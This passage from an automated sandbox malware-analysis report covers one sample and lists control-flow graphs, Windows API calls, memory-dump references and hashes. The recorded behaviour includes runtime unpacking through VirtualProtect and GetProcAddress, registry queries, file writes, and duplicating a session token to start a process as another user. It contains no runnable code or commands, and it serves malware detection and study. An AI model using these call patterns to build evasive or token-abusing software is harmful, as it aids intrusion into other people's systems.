                                                            control_flow_graph 537 10001ac1-10001b0d call 10001eda 540 10001b24-10001b2a 537->540 541 10001b0f-10001b22 call 10001000 call 10006c37 537->541 543 10001b35-10001b5b call 10001f4f 540->543 544 10001b2c-10001b32 call 10006c31 540->544 541->540 551 10001b66-10001b71 call 10001954 543->551 552 10001b5d-10001b63 call 10006c31 543->552 544->543 558 10001b77-10001b82 call 10002172 551->558 559 10001d0e-10001d5d call 10007a60 RegOpenKeyExA 551->559 552->551 566 10001b88-10001bac RegOpenKeyExA 558->566 567 10001cea-10001cef 558->567 564 10001d76-10001d7d 559->564 565 10001d5f-10001d73 call 10006c3d 559->565 571 10001e83-10001e88 564->571 572 10001d83-10001d8f 564->572 565->564 573 10001bc5-10001bcc 566->573 574 10001bae-10001bc2 call 10006c3d 566->574 568 10001cf1-10001d02 call 10006c37 567->568 569 10001d04 567->569 568->569 580 10001ea2-10001ea8 569->580 575 10001e8a-10001e9b call 10006c37 571->575 576 10001e9d 571->576 582 10001d91 572->582 583 10001d94-10001db2 RegQueryValueExA 572->583 578 10001ce2-10001ce5 call 100024d0 573->578 579 10001bd2-10001be6 call 100022ec 573->579 574->573 575->576 576->580 578->567 604 10001be8 579->604 605 10001beb-10001c09 RegQueryValueExA 579->605 589 10001eb3-10001eb8 580->589 590 10001eaa-10001eb0 call 10006c31 580->590 582->583 592 10001db4-10001dc8 call 10006c3d 583->592 593 10001dcb-10001dd2 583->593 599 10001ec3-10001ec8 589->599 600 10001eba-10001ec0 call 10006c31 589->600 590->589 592->593 595 10001e57-10001e6a RegCloseKey 593->595 596 10001dd8-10001e00 call 10007790 593->596 595->571 610 10001e6c-10001e80 call 10006c3d 595->610 618 10001e02-10001e08 call 10006c31 596->618 619 10001e0b-10001e1b 596->619 608 10001ed3-10001ed7 599->608 609 10001eca-10001ed0 call 10006c31 599->609 600->599 604->605 613 10001c22-10001c29 605->613 614 10001c0b-10001c1f call 10006c3d 605->614 609->608 610->571 621 10001cae-10001cc9 call 100023de RegCloseKey 613->621 622 10001c2f-10001c57 call 10007790 613->622 614->613 618->619 626 10001e20-10001e3e RegQueryValueExA 619->626 627 10001e1d 619->627 621->578 634 10001ccb-10001cdf call 10006c3d 621->634 636 10001c62-10001c72 622->636 637 10001c59-10001c5f call 10006c31 622->637 626->595 632 10001e40-10001e54 call 10006c3d 626->632 627->626 632->595 634->578 638 10001c74 636->638 639 10001c77-10001c95 RegQueryValueExA 636->639 637->636 638->639 639->621 644 10001c97-10001cab call 10006c3d 639->644 644->621
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(00000000,00000000,00000000,00000101,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10001BA1
                                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10001BFE
                                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 10001C8A
                                                            • RegCloseKey.KERNELBASE(00000000,00000000), ref: 10001CBE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID:
                                                            • API String ID: 1586453840-0
                                                            • Opcode ID: f0855214115fd223cbb913e5db3fb7eabb5513a8a8adc0242dd8082b078ff416
                                                            • Instruction ID: ea3c58eaec2f1ca8f050d32410ba2af2a79dd5fc6f36e7b1e7bd7beed127cfd1
                                                            • Opcode Fuzzy Hash: f0855214115fd223cbb913e5db3fb7eabb5513a8a8adc0242dd8082b078ff416
                                                            • Instruction Fuzzy Hash: E9B1FA71E40219ABFF40DFA4DC86FEEB7B9EB0C780F144025F604B6285E775AA508B65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 738 403a94-403a9b GetModuleHandleA 739 403adb 738->739 740 403a9d-403aac call 403ab1 738->740 741 403add-403ae1 739->741 750 403b13 740->750 751 403aae-403ab9 GetProcAddress 740->751 743 403b20 call 403b25 741->743 744 403ae3-403aeb GetModuleHandleA 741->744 748 403aed-403af5 744->748 748->748 749 403af7-403afa 748->749 749->741 752 403afc-403afe 749->752 753 403b14-403b1c 750->753 751->739 754 403abb-403ac8 VirtualProtect 751->754 755 403b00-403b02 752->755 756 403b04-403b0c 752->756 762 403b1e 753->762 758 403ada 754->758 759 403aca-403ad8 VirtualProtect 754->759 760 403b0d-403b0e GetProcAddress 755->760 756->760 758->739 759->758 760->750 762->749
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(00403A8B), ref: 00403A94
                                                            • GetModuleHandleA.KERNEL32(?,00403A8B), ref: 00403AE6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00403B0E
                                                              • Part of subcall function 00403AB1: GetProcAddress.KERNEL32(00000000,00403AA2), ref: 00403AB2
                                                              • Part of subcall function 00403AB1: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AC4
                                                              • Part of subcall function 00403AB1: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 923c70ddddceadeb0c71d1ab33cf73939b066fd6eb997284557418a84e784fb6
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: 2001080074524029EA30AE750C029BBBEAC8A1336B714077BB151B62D3D9BCAB06877D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 838 403a55-403a6a 839 403adb 838->839 840 403a6c-403a74 838->840 841 403add-403ae1 839->841 840->839 842 403a76-403aa4 call 403a94 840->842 843 403b20 call 403b25 841->843 844 403ae3-403aeb GetModuleHandleA 841->844 850 403aa6 842->850 851 403b1a-403b1c 842->851 847 403aed-403af5 844->847 847->847 849 403af7-403afa 847->849 849->841 852 403afc-403afe 849->852 853 403aa8-403aac 850->853 854 403b09-403b0c 850->854 855 403b14-403b19 851->855 856 403b1e 851->856 857 403b00-403b02 852->857 858 403b04-403b08 852->858 861 403b13 853->861 862 403aae-403ab9 GetProcAddress 853->862 859 403b0d-403b0e GetProcAddress 854->859 855->851 856->849 857->859 858->854 859->861 861->855 862->839 863 403abb-403ac8 VirtualProtect 862->863 864 403ada 863->864 865 403aca-403ad8 VirtualProtect 863->865 864->839 865->864
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00403A8B), ref: 00403AE6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00403B0E
                                                              • Part of subcall function 00403A94: GetModuleHandleA.KERNEL32(00403A8B), ref: 00403A94
                                                              • Part of subcall function 00403A94: GetProcAddress.KERNEL32(00000000,00403AA2), ref: 00403AB2
                                                              • Part of subcall function 00403A94: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AC4
                                                              • Part of subcall function 00403A94: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction ID: f60a39e3e8785c1a89d7c984efeaf8a6f3676feaad6a0bd9dea1a34d08660972
                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction Fuzzy Hash: DB210A112096415FEB218F744C016677FECCB1736AB1946A7D081E72C3D1BD6A46C77A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 866 403ab1-403ab9 GetProcAddress 867 403adb 866->867 868 403abb-403ac8 VirtualProtect 866->868 869 403add-403ae1 867->869 870 403ada 868->870 871 403aca-403ad8 VirtualProtect 868->871 872 403b20 call 403b25 869->872 873 403ae3-403aeb GetModuleHandleA 869->873 870->867 871->870 875 403aed-403af5 873->875 875->875 876 403af7-403afa 875->876 876->869 877 403afc-403afe 876->877 878 403b00-403b02 877->878 879 403b04-403b0c 877->879 880 403b0d-403b13 GetProcAddress 878->880 879->880 883 403b14-403b1c 880->883 885 403b1e 883->885 885->876
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,00403AA2), ref: 00403AB2
                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AC4
                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00403AA2,00403A8B), ref: 00403AD8
                                                            • GetModuleHandleA.KERNEL32(?,00403A8B), ref: 00403AE6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00403B0E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: e502ba4c8d23c990993f181a334108d9a01d52bfc296286f5d954861f4cdba05
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: FAF0F9003456003DEA305D751C019B7BE9C862772A7140627A151E72C3D4BD9B069379

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 886 1012def0-1012def5 887 1012defb-1012df0b 886->887 888 1012e0dd 886->888 889 1012df1a-1012df1f 887->889 888->888 890 1012df21 889->890 891 1012df23 890->891 892 1012df10-1012df15 890->892 894 1012df28-1012df2a 891->894 893 1012df16-1012df18 892->893 893->889 893->890 895 1012df33-1012df37 894->895 896 1012df2c-1012df31 894->896 897 1012df44-1012df47 895->897 898 1012df39 895->898 896->895 901 1012df50-1012df52 897->901 902 1012df49-1012df4e 897->902 899 1012df63-1012df68 898->899 900 1012df3b-1012df42 898->900 903 1012df6a-1012df73 899->903 904 1012df7b-1012df7d 899->904 900->897 900->899 901->894 902->901 905 1012df75-1012df79 903->905 906 1012dfea-1012dfed 903->906 907 1012df86 904->907 908 1012df7f-1012df84 904->908 905->907 909 1012dff2-1012dff5 906->909 910 1012df54-1012df56 907->910 911 1012df88-1012df8b 907->911 908->907 914 1012dff7-1012dff9 909->914 912 1012df58-1012df5d 910->912 913 1012df5f-1012df61 910->913 915 1012df94 911->915 916 1012df8d-1012df92 911->916 912->913 918 1012dfb5-1012dfc4 913->918 914->909 919 1012dffb-1012dffe 914->919 915->910 917 1012df96-1012df98 915->917 916->915 920 1012dfa1-1012dfa5 917->920 921 1012df9a-1012df9f 917->921 922 1012dfc6-1012dfcd 918->922 923 1012dfd4-1012dfe1 918->923 919->909 924 1012e000-1012e01c 919->924 920->917 926 1012dfa7 920->926 921->920 922->922 927 1012dfcf 922->927 923->923 928 1012dfe3-1012dfe5 923->928 924->914 925 1012e01e 924->925 929 1012e024-1012e028 925->929 930 1012dfb2 926->930 931 1012dfa9-1012dfb0 926->931 927->893 928->893 932 1012e066-1012e069 929->932 933 1012e02a-1012e040 LoadLibraryA 929->933 930->918 931->917 931->930 935 1012e06c-1012e073 932->935 934 1012e041-1012e046 933->934 934->929 936 1012e048-1012e057 GetProcAddress 934->936 937 1012e0a0-1012e0d0 VirtualProtect * 2 935->937 938 1012e075-1012e077 935->938 939 1012e060-1012e063 936->939 940 1012e059-1012e05e 936->940 943 1012e0d4-1012e0d8 937->943 941 1012e08a-1012e097 938->941 942 1012e079-1012e088 938->942 940->934 941->942 944 1012e099-1012e09e 941->944 942->935 943->943 945 1012e0da 943->945 944->942 945->888
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?), ref: 1012E03A
                                                            • GetProcAddress.KERNEL32(?,1012BFF9), ref: 1012E04F
                                                            • VirtualProtect.KERNELBASE(10000000,00001000,00000004,?,00000000), ref: 1012E0B7
                                                            • VirtualProtect.KERNEL32(10000000,00001000), ref: 1012E0CC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3300690313-0
                                                            • Opcode ID: 0a31c58a730e33e88502e6dcb6f2e1ef9e9dd1543261cb3a9e9936af60ff1ce2
                                                            • Instruction ID: 578a6a21ed0bba5227c85e7016d212ba7d0676c042bb25e3fa8c4e053026c315
                                                            • Opcode Fuzzy Hash: 0a31c58a730e33e88502e6dcb6f2e1ef9e9dd1543261cb3a9e9936af60ff1ce2
                                                            • Instruction Fuzzy Hash: D1510972B443924BD310AEB8EEC065177D0EB46360BFA0778E5E6C73C5E7A858078768

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 946 401b97-401be6 call 401b40 949 401bf1-401c05 call 401de9 946->949 950 401be8-401bee call 402150 946->950 955 401c4b 949->955 956 401c0b-401c1e lstrlenW 949->956 950->949 959 401c50-401c52 955->959 957 401c20-401c34 call 402144 956->957 958 401c37-401c3e 956->958 957->958 958->955 961 401c44-401c49 958->961 962 401da2-401da7 959->962 963 401c58-401c8c WideCharToMultiByte 959->963 961->959 965 401da9-401dba call 402156 962->965 966 401dbc-401dc7 962->966 967 401ca5-401cd0 call 4025f0 963->967 968 401c8e-401ca2 call 402144 963->968 965->966 976 401dd2-401dd7 966->976 977 401dc9-401dcf call 402150 966->977 980 401cd2-401cd8 call 402150 967->980 981 401cdb-401d1b call 4019ff WideCharToMultiByte 967->981 968->967 978 401de2-401de6 976->978 979 401dd9-401ddf call 402150 976->979 977->976 979->978 980->981 990 401d34-401d4a strlen 981->990 991 401d1d-401d31 call 402144 981->991 993 401d63-401d93 call 402620 990->993 994 401d4c-401d60 call 402144 990->994 991->990 1000 401d95-401d9b call 402150 993->1000 1001 401d9e-401d9f 993->1001 994->993 1000->1001 1001->962
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000), ref: 00401C13
                                                            • WideCharToMultiByte.KERNELBASE(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00401C81
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00401D10
                                                            • strlen.MSVCRT ref: 00401D3C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$lstrlenstrlen
                                                            • String ID:
                                                            • API String ID: 1146637441-0
                                                            • Opcode ID: d0a4d255880ecfc4b29345094ac5ac903ddca688ba5926be486dfae7eb28a327
                                                            • Instruction ID: 52c09a160a63f74b40e4258c51a95635e318491f13dfe54585de5992e64fb342
                                                            • Opcode Fuzzy Hash: d0a4d255880ecfc4b29345094ac5ac903ddca688ba5926be486dfae7eb28a327
                                                            • Instruction Fuzzy Hash: E25178B1D00305ABEB10EFD5DD86B9F7BB4AF08304F14443AF714BA2D1D67996508B99

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1004 402550-402575 CreateFileA 1005 4025e2-4025e6 1004->1005 1006 402577-402589 1004->1006 1007 4025d4-4025e1 CloseHandle 1006->1007 1008 40258b-402591 1006->1008 1007->1005 1009 402595-4025ab WriteFile 1008->1009 1010 4025cc 1009->1010 1011 4025ad-4025b7 1009->1011 1010->1007 1011->1009 1012 4025b9-4025cb FindCloseChangeNotification 1011->1012
                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005,00000000,00000000), ref: 00402568
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,0000026C,?,00000000,80000005,00000000,00000000), ref: 004025A7
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,0000026C,?,00000000,80000005,00000000,00000000), ref: 004025BA
                                                            • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005,00000000,00000000), ref: 004025D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFile$ChangeCreateFindHandleNotificationWrite
                                                            • String ID:
                                                            • API String ID: 2570977422-0
                                                            • Opcode ID: de5dcd819fa2fbf19076c8e2d2b0277d6a684f8bc603187b212ce3ea4a388375
                                                            • Instruction ID: ae047e808992e14c8c018aed7cfc4c96bb107c7dfe376e8bfe613ff68d8d1be0
                                                            • Opcode Fuzzy Hash: de5dcd819fa2fbf19076c8e2d2b0277d6a684f8bc603187b212ce3ea4a388375
                                                            • Instruction Fuzzy Hash: 6C119172204301ABD720DF18ED89F6AB3E8EB84711F15492AFA54A72D0D374E8098769
                                                            APIs
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000), ref: 0040159F
                                                            • lstrlenW.KERNEL32(00000000), ref: 004015E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FolderPathSpeciallstrlen
                                                            • String ID:
                                                            • API String ID: 4209730860-0
                                                            • Opcode ID: 840d276d7f004666aff7ee9b07e5bee6c482c432e03576b1161134a32b52ba12
                                                            • Instruction ID: c38f127bb8a1c82e0b6df6d0c460784880a9a2ae468f45bae7d4a9924e2b68d5
                                                            • Opcode Fuzzy Hash: 840d276d7f004666aff7ee9b07e5bee6c482c432e03576b1161134a32b52ba12
                                                            • Instruction Fuzzy Hash: 17C1A571E00209EBDF00AFD5DD96BAE7BB4EB08304F14847AF604BA2D1D7798A64C759
                                                            APIs
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 100019B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoNativeSystem
                                                            • String ID:
                                                            • API String ID: 1721193555-0
                                                            • Opcode ID: 6f743c8407fe56e5553e92c1292b5375a800b671ea3dea23c3fdc52f287cf9c5
                                                            • Instruction ID: cc071c29e058b9b689fab62ea748cea7886f02fab7734c170ffefe5d617dfdae
                                                            • Opcode Fuzzy Hash: 6f743c8407fe56e5553e92c1292b5375a800b671ea3dea23c3fdc52f287cf9c5
                                                            • Instruction Fuzzy Hash: F6318774F81309ABFB10CE909C96BED77F8DF05780F204069E909B6285E6B59B40DB53
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 886e80ec98b6246903e7121885a6e4e3cc3f2dd87b6d3b76a045e357eaff80b3
                                                            • Instruction ID: 3d5f099be09213ff482592799049f47137053dd8317983e58a27a5202c9bcccd
                                                            • Opcode Fuzzy Hash: 886e80ec98b6246903e7121885a6e4e3cc3f2dd87b6d3b76a045e357eaff80b3
                                                            • Instruction Fuzzy Hash: B4D05E745002049FCB01AFA8EA0968677E8BB18300B808428BF20DB355E638E818CB86
                                                            APIs
                                                            • WTSGetActiveConsoleSessionId.KERNEL32 ref: 10004818
                                                            • 74AE1930.WTSAPI32(00000000,00000000), ref: 1000484B
                                                            • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000001,00000001,00000000), ref: 10004892
                                                            • 74727ED0.USERENV(00000000,00000000,00000000), ref: 100048CA
                                                            • CreateProcessAsUserA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 10004A49
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: 74727ActiveConsoleCreateDuplicateE1930ProcessSessionTokenUser
                                                            • String ID:
                                                            • API String ID: 3242307642-0
                                                            • Opcode ID: b817c15e6a150e61add105fc304b6c7d7e25abaf4457025e867f3c579e64022f
                                                            • Instruction ID: 6a825b57c3577096f25abb35548e8f7a7403e8993c92282e39c27ba01eba1fd2
                                                            • Opcode Fuzzy Hash: b817c15e6a150e61add105fc304b6c7d7e25abaf4457025e867f3c579e64022f
                                                            • Instruction Fuzzy Hash: 49F103B1A8035A9BFF00CFA4DC82B99B7B1EF19350F240460E549BB345D779B960CB26
                                                            APIs
